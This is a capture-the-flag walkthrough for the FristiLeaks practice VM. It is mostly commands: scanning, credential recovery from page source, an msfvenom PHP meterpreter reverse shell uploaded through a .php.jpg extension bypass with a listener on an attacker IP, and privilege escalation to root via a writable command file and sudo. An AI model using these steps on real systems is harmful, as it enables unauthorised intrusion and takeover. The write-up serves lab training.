
Hack the Fristileaks VM (CTF Challenge)

Today we will walk through the FristiLeaks VM. We know nothing about this VM except that its difficulty level is beginner to intermediate, and that it only works with the MAC address 08:00:27:A5:A6:76; with any other MAC address it will not boot correctly.
Walkthrough
As always, we start by locating our target:
netdiscover
Our target is 192.168.0.101. Now scan it with nmap:
nmap -p- -A 192.168.0.101

The scan shows that port 80 is open, so let's open it in a browser.

Neither the page nor its source proves useful, so we ran nikto against it and found three directories: /sisi, /cola and /beer. All three show the same image:
There is nothing in this page's source either, and no metadata hidden in the image. It then occurred to me that fristi is also a drink, like cola, beer or sisi, and that it was referenced on the home page, so /fristi may well be a directory here too. There was no harm in trying it.
It was: /fristi is an admin login portal with an image. Let's look at its page source.

In the page source you will find a long, unusual block of code, as shown above. Copy this code, then right-click on the image and select Inspect Element (Q).
The inspector panel opens.

Select the image's long code string and replace it with the one you copied earlier.

Once the code is pasted, the image disappears and some text appears in its place. This text may be a password, and if you remember, the page source also contained the word eezeepz, which could be our username. You can see it in the image below.
Enter the username and password and log in.

Once logged in you will find a page that lets you upload a file, so this is where we upload our PHP reverse shell. To generate it, go to your Kali terminal and type:
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.0.105 lport=4444 -f raw
Copy the output from <?php to die(); and save it in a file with a .php extension. Uploading it as .php produces an error, so rename it to shell.php.jpg and upload that instead.
Once the file is uploaded, open 192.168.0.101/fristi/uploads/shell.php.jpg in the browser to run it.

When it runs you will get a meterpreter session. To receive it, have a handler running in msfconsole:
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set lhost 192.168.0.105
set lport 4444
exploit
Once the session arrives, type shell to drop into a system shell, then run the following commands to get a proper interactive terminal:
echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
python /tmp/asdf.py


Then go to /www folder by typing:
cd www
ls -al (this lists the files and folders)
Here we find a notes.txt. Let's read it:
cat notes.txt

notes.txt contains a message from jerry hinting that we should look in the home directory. Let's do that:
cd /home
ls –la
Here you will find a directory for each user. Entering any of them gives permission denied, except for eezeepz. So type the following to go into it:
cd eezeepz

Inside the eezeepz folder you will again find a notes.txt. Read it:
cat notes.txt

Again notes.txt contains a message from jerry telling us what to do, so let's follow his instructions:
echo "/usr/bin/../../bin/chmod -R 777 /home/admin" > /tmp/runthis
After running the command, go back to /home and from there into the admin directory:
cd /home
ls –la
cd admin
ls -la

In the admin directory you will find three important files: cryptedpass.txt, cryptpass.py and whoisyourgodnow.txt. Read them one by one:
cat whoisyourgodnow.txt
cat cryptedpass.txt
cat cryptpass.py

Two of them contain data in base64-encoded form; these may be passwords. Decode them and you will get the word LetThereBeFristi!
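The decoding step above, as an added example that is not part of the original walkthrough or the VM's own code: the page does not reproduce cryptpass.py, so the scheme implemented here (base64, then reverse the string, then rot13) is my assumption about what that script does, and the encoder is included only so the decoder can be checked against the page's own password.

```python
# Added example: decoder for the assumed cryptpass.py scheme (base64 -> reverse -> rot13).
# None of the three steps uses a key, so this is obfuscation, not encryption:
# anyone who obtains the script, or guesses the steps, can recover the plaintext.
import base64
import codecs


def fristi_encode(plaintext: str) -> str:
    """Re-implementation of the assumed cryptpass.py encoder."""
    b64 = base64.b64encode(plaintext.encode("utf-8")).decode("ascii")
    return codecs.encode(b64[::-1], "rot13")


def fristi_decode(blob: str) -> str:
    """Undo the three transforms in reverse order: rot13, un-reverse, base64-decode."""
    reversed_b64 = codecs.decode(blob, "rot13")  # rot13 is its own inverse
    b64 = reversed_b64[::-1]
    return base64.b64decode(b64).decode("utf-8")


def looks_reversed_base64(blob: str) -> bool:
    """Review heuristic: base64 padding '=' belongs at the END of a string, so a
    leading '=' with none at the end is a tell-tale sign the text was reversed."""
    return blob.startswith("=") and not blob.endswith("=")


if __name__ == "__main__":
    # Constructed sample: the password the walkthrough recovers.
    blob = fristi_encode("LetThereBeFristi!")
    print(blob, looks_reversed_base64(blob))
    print(fristi_decode(blob))
```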
Now switch user by typing:
su fristigod
and enter the password when asked: LetThereBeFristi!
Then check your id:
id
And list the files:
ls -la
Now go to /var and see what it contains:
cd /var
ls -la
You will find a folder called fristigod; enter it and list its contents:
cd fristigod
ls -la

In here you will find a file called .bash_history. It contains all the commands previously run by admin. Let's read it:
cat .bash_history

We will try one of them:
sudo -l
And give the password when required.

Now, to reach the flag, run the following sequence of commands:
sudo -u fristi .secret_admin_stuff/docom /bin/sh
id
cd /root
ls -la
cat fristileaks_secrets.txt

And VOILA!!! You have extracted the flag. Congratulations.

Author: Yashika Dhir is a passionate Researcher and Technical Writer at Hacking Articles. She is a hacking enthusiast
